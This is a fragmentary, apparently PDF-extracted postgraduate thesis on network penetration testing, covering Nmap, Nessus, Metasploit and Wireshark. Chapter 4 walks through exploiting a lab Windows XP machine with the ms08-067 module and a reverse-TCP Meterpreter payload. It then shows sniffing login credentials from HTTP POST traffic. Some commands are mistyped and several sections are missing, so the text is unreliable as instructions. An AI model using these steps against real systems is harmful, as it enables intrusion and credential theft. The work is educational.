Professional Documents
Culture Documents
Testing
by
1
CERTIFICATE
Dr. Md Whaiduzzaman
Supervisor
BOARD OF EXAMINERS
2
DECLARATION
I hereby declare that this project work is based on the results found by
ourselves. Materials of work found by other researcher are mentioned by reference.
This thesis, neither in whole nor in part, has been previously submitted for any
degree.
____________________
Md Yusuf Miah
PMIT: 172139
3
DEDICATION
This research paper is dedicated to my dear father, Who has been working on my
inspiration for my studies as a whole until today, and my beloved mother who, for
months past, has encouraged me attentively with her fullest and truest attention to
accomplish my work with truthful self-confidence.
4
Fig-1.1: Network Penetration Approach and Methodology
Fig-3.4: Nessus
5
Fig-4.8: Start Captureing
6
LIST OF ABBREVIATIONS
7
ACKNOWLEDGEMENT
In completion this Post Graduate project I have been fortunate to have support
encouragement form many people. I would like to acknowledgement them for their
co-operation.
I also feel fortunate to be blessed with the guidance and encouragement from my
faculty members. And we remember our friends who helped and supported us a lot.
8
ABSTRACT
With the emergence of network globalization and advent of internet being the major
tool for international exchange of information, security has always been the most
talked about the topic. Although there are many ways to secure systems and
applications, the only way to truly know how to secure the network is to test it using
some testing procedures.
Hacking and Penetration testing is a testing procedure that is performed to test the
perimeter of a network for security breaches and vulnerabilities. Penetration testing
is also known as ethical hacking because the test is performed by a team of security
experts that have the organization’s permission to hack the network in an attempt to
identify vulnerabilities.
Any security issues that are found will be presented to the system owner, together
with an assessment of their impact, and often with proposal for mitigation or a
technical solution. Thus all the work is done in a proper manner.
9
TABLE OF CONTENTS
Certificate
Candidate’s Declaration
Dedication
List of Tables and Figures
List of Abbreviations
CHAPTER 1..............................................................................................................1-8
1.0 Overview........................................................................................................1
1.1 Introduction2
1.2 Objective of the Study3
1.3 Research Problem Statement4
1.4 Limitations and Delimitation of the Study4
1.5 Internal Penetration Test5
1.6 External Penetration Test7
1.7 Approach8
CHAPTER 2 Information Gathering9-15
2.1 Introduction9
2.2 Service and OS Detection10
2.3 Topology11
2.4 Who is Information12
2.5 IP Address13
2.6 Web Server14
2.7 Sub Domain15
CHAPTER 3 Vulnerability Analysis of Network16-24
3.1 Introduction16
3.2 Black box network vulnerability assessment17
3.3 White Box Network Vulnerability Assessment18
3.4 Gray Box Network Vulnerability Assessment19
3.5 Nessus Vulnerability Scanner20
CHAPTER 4 Exploitation25-33
4.1 Introduction25
4.2 Scanning Phase26
4.3 Packet Sniffers by Wireshark Tool30
CHAPTER 5 Discussion and Conclusion33-36
5.1 Analysis and Sidcussion33
5.2 Reflection on The Proposal Methodology34
5.3 Contribution35
5.4 Future Work35
5.4 Conclusion36
REFERENCE37
10
CHAPTER 1
Introduction
1.0. Overview
This type of assessment is an attack simulation carried out by our highly trained
security consultants in an effort to:
As a result of our penetration tests, you’ll be able to view your applications through
the eyes of both a hacker and an experienced developer to discover where you can
improve your security posture. Our consultants produce findings in written reports
and provide your team with the guidance necessary to effectively remediate any
issues we uncover.
1.1 Introduction
11
About two or three decades ago, people were quite happy to leave their houses and
cars unlocked due to low crime levels. However, time has changed now and the
world is fast becoming an unsecured place to live especially for organizations which
deal with influx of heavy data on daily basis, since security has always been an
important issue due to network globalization and internet. However, Ethical hacking
and penetration techniques are preventive measures which consist of a chain of
legitimate tools that identify and exploit a company’s security weaknesses. Ethical
hacking and penetration testing is a platform to find out flaws in network systems.
Vulnerability assessment takes a center stage in finding the weakness of networks
and exploiting such vulnerabilities to detect weakness of the network. Penetration
testing in general involves a lot of techniques such as social engineering and
reconnaissance and most importantly methodologies for using the require tools. [1]
12
Fig-1.1: Network Penetration Approach and Methodology [copied]
13
1.3 Research Problem Statement
Ethical Hacking and Penetration Test is concise where vulnerabilities are found in an
information system and such acts are done in consultation with owners of the
network. Notwithstanding, social engineering is the art of utilizing human behavior
to breach security without the participant even realizing that they have been
manipulated. Sometime black hat hackers get their chance when there are genuine
gaps in the security that they can breach
The problem statements of advance hacking and penetration techniques are as
follows;
Ninety percent (90%) of Social engineering techniques are used for active
and passive reconnaissance for the targeted network.
Weak genuine security implementation gaps in networks.
How to eliminate two main category of social engineering techniques
Technology based deception
Human based deception
Tools such as software’s and methods available to restrict black hat hackers
after applying penetration test.
Software tools used to identify vulnerabilities in an information systems and
techniques to prevent such flaws.
14
available and legitimately accessible to the ethical hacker. This prevents a
penetration testing from simulating as closely of the malicious hackers’ activities
because they are not constrained by any limitations. Firstly, penetration testing may
be governed by the laws and contractual obligations of the organization’s system
because if the test unintentionally retrieves highly confidential information, this may
result in violating the laws and breaching of contractual agreements.
This study is limited to
Getting the right information will not be possible.
Acquiring the right or required software tools for penetration testing.
Incorrect data will be collected when questionnaires are distributed in the
domains of Banks, Internet Service Providers (ISP) and other data centers.
Evaluation software tools without adequate features.
15
Port Scanning
Exploit Research
Manual Vulnerability Testing and Verification
Manual Configuration Weakness Testing and Verification
Limited Application Layer Testing
Firewall and ACL Testing
Administrator Privileges Escalation Testing
Password Strength Testing
Network Equipment Security Controls Testing
Database Security Controls Testing
Internal Network Scan for Known Trojans
16
1.6 External Penetration Test
An External Penetration Test differs from a vulnerability assessment in that it
actually exploits the vulnerabilities to determine what information is actually
exposed to the outside world. An External Penetration Test mimics the actions of an
actual attacker exploiting weaknesses in the network security without the usual
dangers. This test examines external IT systems for any weakness that could be used
by an external attacker to disrupt the confidentiality, availability or integrity of the
network, thereby allowing the organization to address each weakness. [3]
Footprinting
Public Information & Information Leakage
DNS Analysis & DNS Bruteforcing
Port Scanning
System Fingerprinting
Services Probing
Exploit Research
Manual Vulnerability Testing and Verification of Identified Vulnerabilities
Intrusion Detection/Prevention System Testing
Password Service Strength Testing
Remediation Retest (optional)
17
1.7 Approach
MIT Security’s network penetration testing service utilizes a comprehensive, risk-
based approach to manually identify critical application-centric vulnerabilities that
exist on all in-scope applications.
18
CHAPTER 2
Information Gathering
2.1 Introduction
In the same manner Network Penetration is also much like this. When you are going
to hunt a website down then you must know what really you are going to deal with, if
you know your enemy which you are going to face then you can prepare yourself for
that.
So this is why Information Gathering is the first phase of Penetration testing. But
now arise the question what information are we going to collect and where are we
going to get that information from. "Where and how".
2.1.1 There are two types of information gathering:
Passive Information Gathering
Active Information Gathering
19
2.2 Service and OS Detection
Well most of you know what an operating system is but still if any one is confused
that why do we need to know the OS, Notice that the output was highlighted; for
example, open and closed ports were displayed in different colors. [4]
Explain (Fig-2.1): We’ve run a intense scan against a host with the IP address of
10.10.110.2 A scan window contains five tabs, each displaying different aspects of
the scan results:
root@kali:~# nmap –T4 –A –v 10.10.110.2
-v = Increase verbosity level use -vv or more for greater effect
-A = Detect OS and Services
20
2.3 Topology
Each circle on the diagram represents a host found on the network. If a host has less
than three open ports, it will be green; more than three but less than six open ports,
yellow; and more than six open ports, red. Hosts with filtered ports will have a
yellow padlock symbol next to them.
21
2.4 Who is Information
This is the most basic information about a domain, It shows the registration Details
of the website in which you can commonly see who registered the domain and which
date did he registered it on, when will it expire etc. This information may help you
sometimes in Social engineering like sending him email on his registered email. Or
you use his address, name or contact number in various tasks of Social Engineering.
Explain (Fig-2.3): Find information on any domain name or IP. Large database of
whois information, DNS, domain names, name servers etc.
22
2.5 IP Address
Well this ones for newbie’s, actually IP address is the real address behind any
domain name which are resolved by the nameservers. Every Box or you can say a
system contains a unique IP address for example (162.248.48.130). Using it
computers communicate to each other. IP Address will help us targeting the network
as well as find open ports and other exploitable services on the system while
penetration.
Explain (Fig-2.4): The nslookup (which stands for name server lookup) command
finds name server information for domains by querying the Domain Name System.
23
2.6 Web Server
Webservers the one we are dealing over here is an application which is running over
an Operating system and serves to the web requests coming to the system. Like
Apache, Tomcat, IIS etc are webservers running on an operating system when any
web request is sent to a system they handle it and they are responsible for giving out
the response. Many times you can get Exploits related to a webserver and gets a way
into the system using that exploit, and if you know which webserver is being used
then it will help you to find out the default directories or known vulnerabilities for
that web server. [6]
Explain (Fig-2.5): Find information on web server information which server & PHP
version use.
24
2.7 Sub Domain
If you do not know what subdomains are then, Subdomain are domains maintained
under a domain for example google.com is a domain name then mail.google.com is a
subdomain inside it. We need to collect all available sub domains for a website. In
many cases you may find hidden or private domain where they are maintaining
something private and such application are usually left vulnerable and exposed
because of the assumption the no one can reach them. [7]
Explain (Fig-2.6): A subdomain is a domain that is part of a larger domain; the only
domain that is not also a subdomain is the root domain. Notice that the output was
highlighted; for example, subdomin displayed in different IP.
25
CHAPTER 3
3.1 Introduction
Vulnerability analysis, also known as vulnerability assessment, is a process that
defines, identifies, and classifies the security holes (vulnerabilities) in a computer,
network, or communications infrastructure. In addition, vulnerability analysis can
forecast the effectiveness of proposed countermeasures and evaluate their actual
effectiveness after they are put into use.
26
The list of vulnerability assessment tools is quite long. Among the most well-known
are OpenVAS, Nessus, Nikto, Wireshark, W3af, BurpSuite, SQLMap, IBM
Application Security on Cloud, etc.
Explain (Fig-3.1): This is overview of how corporate networks are organized and
how to penetration test of black box network vulnerability assessment.
27
3.3 White Box Network Vulnerability Assessment
If the cybersecurity team is to perform white box network vulnerability assessment,
they look at the network ‘from the inside,’ having all the privileges of the network
authorized users. They can see the entire network with its file servers, databases. The
security engineers have administrator access to all the servers inside the network.
Their aim is not just to scan the network for vulnerabilities, but also check the
security of the configuration of the machines inside the network.
Explain (Fig-3.2): This is overview of how corporate networks are organized and
how to penetration test of white box network vulnerability assessment.
28
3.4 Gray Box Network Vulnerability Assessment
The third option is gray box network vulnerability assessment that encompasses both
approaches but is closer to black box vulnerability assessment. Security engineers
conduct gray box vulnerability assessment if they get some information on the
organization’s network, such as user login details, but they don’t get access to the
entire network.
Explain (Fig-3.3): This is overview of how corporate networks are organized and
how to penetration test of gray box network vulnerability assessment.
29
3.5 Nessus Vulnerability Scanner
Explain (Fig-3.4): This is admin login page of Nessus Vulnerability Scanner tools.
Fig-3.4: Nessus
30
Step 2: New Scan in Nessus
You can start a new scan by clicking on the new scan buttons. You can also create
multiple scans depending on your requirements.
Explain (Fig-3.5): This is add new scan starting page of Nessus Vulnerability
Scanner tools.
31
Step 3: Scan Type and Settings.
You may have to enter scan details like the name of the scan, description of the scan
and even targets. This includes the IP address of the targets
Explain (Fig-3.6): This is overview of target victim ip & general setting scanning
system.
32
Step 4: Scan Type
Depending on your package, you can select the type of scan that you are willing to
run. You may have to upgrade the package in order to run some special scans.
Explain (Fig-3.7): This is overview of scanning type. Which is prefer for target
victim.
Explain (Fig-3.8): This is overview of scanning result. Now we see how many
vulnerabilities are there critical or low.
33
Fig-3.8: Scan Result
Step 6: Detailed Report
You can also click on the name of the vulnerability to find a detailed report about the
vulnerability and the available fix.
34
CHAPTER 4
Exploitation
4.1 Introduction
Exploitation is the meridian for every security engineer. It is a great feeling to exploit
a first machine and get full control over that machine. Exploitation is a very difficult
task to accomplish. We need to know much about the target. In this chapter i will
show you advanced techniques to get shell on the target system and you will gain full
control over the victim system.
35
4.2 Scanning Phase
First thing when you want to hack server, you must get the information of target as
much as you can. So the first thing we must do is scan server.
Metastploit has “db_nmap” a module that use to run nmap (the most famous
scanning tool) and when it gets the result from nmap, it is putting the results into the
database which was created to keep the results. Follow these steps:
36
Step 3: Search for netapi to use exploit windows xp machine.
Msf5 > search netapi
Step 4: Enter command :
Msf5 > use exploit/windows/smb/ms08-067-netapi
Explain (Fig-4.2): Now we will search the Netapi exploit, We’ll be shown a number
of results, among which we’ll find the below vulnerable work or not.
Step 5: Enter command as show options, Now it's time to enter victim ip address.
For that command is :
set RHST enter_victim_ipaddress
Step 6: Loading exploit module to compromise victiom machine
set payload windows/meterpreter/reverse_tcp
Explain (Fig-4.3): The exploit is chosen and we need to set certain parameters for
this exploit.
37
Fig-4.3: Set Payload
Step 7: Setting attacker's ip address ,to get reverse connection from victim machine
set LHOST your_ipaddress
Explain (Fig-4.4): Set lport and lhost, which are the port number and IP address of
the local machine/attacker machine.
38
Step 8: Forex. run vnc
We can inject a VNC server remotely using the Metasploit payload for the VNC
injection.
Explain (Fig-4.5): The Virtual Network Computing (VNC) is a graphical desktop
sharing system that uses the Remote Frame Buffer protocol (RFB) to remotely
control another computer.
39
Explain (Fig-4.6): This is victim Machine…
In Wireshark go to Capture > Interface and tick the interface that applies to you. In
my case, I am using a Wireless USB card, so I’ve selected wlan0. [10]
Explain (Fig-4.7): When we launch Wireshark, a welcome screen lists the available
network connections on your current device. Displayed to the right of each is an
EKG-style line graph that represents live traffic on that network.
40
Fig-4.7: Run Wireshark
Ideally you could just press Start button here and Wireshark will start capturing
traffic. In case you missed this, you can always capture traffic by going back to
Capture > Interface > Start
Explain (Fig-4.8): Start Wireshark by clicking on the Wireshark start icon. When
Wireshark starts it launches the following screen and provides the following ways to
capture network traffic.
41
Fig-4.8: Start Capturing
when wee type in your username, password and press the Login button, it generates a
a POST method (in short – you’re sending data to the remote server).
To filter all traffic and locate POST data, type in the following in the filter section
http.request.method == “POST”
See screenshot below. It is showing 1 POST event.
Explain (Fig-4.9): The most basic way to apply a filter is by typing it into the filter
box at the top of the window and clicking Apply (or pressing Enter). For example,
type “http” and you’ll see only http packets. When we start typing, Wireshark will
help us auto complete our filter.
42
Fig-4.9: HTTP Request
Step 3: Analyze POST data for username and password
Now click on that line of HTML Form URL Encoded
Explain (Fig-4.10): A POST data is a results of user infromation; the email &
passward form the different item.
43
CHAPTER 5
Intelligence gathering phase identified the machines that were reachable and the
ports open on them, guessed the OS and service on those reachable machines. Nmap
was the primary tool selected for intelligence gathering phase. Nmap proved to be a
versatile tool which scan perform different scans ranging from ping scan to port scan
to OS and services fingerprinting. Initially the Nmap was used to scan the entire
172.29.81.0/20 network range. This scan successfully identified many but only four
targeted machines which IP addresses were 172.29.81.2/20, 172.29.81.90/20, and
172.29.81.93/20 and these machines were identified. This result showed that ICMP
packets within the network were not
blocked and the scan result showed all 1000 ports in identified machines were
unfiltered, which meant no Firewalls or perimeter devices were used to filter the data
in the target machines.
Detail Nmap scan shows open ports, closed ports and number of service being run on
the machines were fully captured on Table 4.17 and 4.18 respectively.
The fascinating result obtained from the main target machine when used Armitage
tool, the vulnerable service to compromise the machine was when metasploit was
applied which revealed msf> use window.smb/ms08_067_netpati which indicated
that 172.29.81.2 port 445 therefore the target is vulnerable. Both Window XP and
window 8 were running the default installation and no additional software installed
on machines. In laboratory network, both of these vulnerabilities were successfully
exploited using Metasploit Framework using Armitage which is Metesploit
Framework graphical interface as shown in Figure 4.19.
44
5.2. Reflection on The Proposal Methodology
One of the goal set in this thesis was to identify how penetration testing by law is
conducted to understand, analyzed security issues pertaining to network systems as a
whole. In order to achieve this goal, a penetration testing methodology was proposed
section 4.1. Following this methodology, penetration testing were conducted against
the laboratory network. Laboratory network represented the internal network with
few clients and server machines. For network and system Administrators, securing
the network and system in an important task to protect network or system from an
outside as well as an inside attacks. Security measures like firewalls and Intruder
Detection System (IDS) help to protect but such measures are not always sufficient
in today’s complex environment. A methodological penetration testing complements
such security measures to test if such security measures in place are good enough or
they have some flaws or misconfiguration.
The proposed methodology not only presented how network and systems
Administrators can utilizes a penetration test but also understand the flow of test
along with each phase. It also showed how free or open source software can
effectively test the networks or systems. These were discussed in literature and part
of methodology chapters and demonstrated how such tools compliments
administrator’s efficiency at assessing the overall system security. Tools selected in
each phase of the proposed methodology were easy to install and configure, the
learning curve to use such tools were minimal and did not require a high end
hardware to setup configuration penetration test.
Scanners enhance the scanning and assessment and discover the extra information
which might have missed during reconnaissance gathering phase. The results or
reports analysis from reconnaissance phase can provide a deeper insight about the
network or system.
However, such analysis helped further to find out what are the real flaws whether it
was a faulty configuration or unpatched systems. The penetration testing
methodology was successful at achieving objective set in scanning and vulnerability
assessment phase. From the pen-tester prospective, one can argue, should the tester
spend additional time performing such penetration testing? Results drawn from this
thesis showed that penetration testing had a value of performed in a systematic and
methodological manner. Penetration testing is something that network and system
Administrators had to live without because of all the other activities they perform
harden the system.
45
5.3 Contribution
Network administrators should be skillful to perform penetration testing to know
flaws their network systems have. Not all network/system administrators can afford
to purchase the commercial tools to perform penetration test. Specially, the
administrator who works in medium or small organization, there will not always be a
separate budget allocation to purchase or hire third party professional to perform
penetration tests. In such a situation this thesis work can provide baseline
information with all the tools.
and methodology. Any Administrator can easily replicate the same or similar
penetration environment. However, depending upon the scope can be broaden.
At present, mostly network/system administrators defend their network or systems
using firewalls to block unidentified or malicious traffic, Intruder Detection System
(IDS) to detect and respond to attacks, anti-virus and anti-malware programs to alert
users about malicious software however, the goal to defend the system or network
from malicious users and intrusion attempts. All those measures are protective and
preventive in nature, which can either succeed or fail on the time they are released
and current evolutions in technology. However, security should not only include
prevention and protection but also prediction and response.
This Thesis also presented a prediction and response model where phases like
intelligence gathering and scanning and vulnerability assessment can be used to
predict the network or system while phases like Exploitation and reporting for
response required to countermeasure the threat and loopholes. After certain time,
certain vulnerability or attack becomes obsolete, but the knowledge on the software
responded to an attack of that extent, can help in identifying similar behaviors in the
future.
46
5.5 Conclusion
After going through a deep study of penetration testing framework and analyzing the
various tools used, we have reach to a point of conclusion that:
This thesis explored and investigated the various network penetration testing tools
and methodologies. The main results are as follows;
Design and developed the enhance framework of network penetration testing
over the laboratory personally built. This framework tries to find out the
loopholes and vulnerabilities in the network and exploit them before
attackers. Hence provide an assurance of secure network.
Demonstrated the use of penetration testing over campus network by
avoiding unnecessary expenditure of professional testers as they also follow
same tools and techniques and their unreliable nature.
The success of any penetration test depends on the underlying methodology. In order
to perform successful penetration test, the underlying methodology should also make
use of different security tools. One of the goal set in this thesis was to examine
different security tools and techniques. Different tools like Nmap. Nessus, Armitage
and Metesploit Framework were introduced first and examined. The selection of the
tools were based on its versatility, usability
and effectiveness. With all the tools in hand, each phase of the methodology were
carried out in a systematic and methodological manner. The selected tools were
divided into three categories.
The reconnaissance or intelligence gathering phase covered the tools which assisted
in network profiling, network scanning and operating and service fingerprinting.
Nmap was identified as one of the best tool during this phase. Scanning and
Vulnerability Assessment phase covered the tools which
allowed the exploration of network and system vulnerabilities. Metasploit framework
or Armitage was more than a tool, it was complete penetration testing framework,
but it can also be used as a tool during exploration and post-exploitation phases due
to its abundance of arbitrary exploits, usability and effectiveness.
47
References
48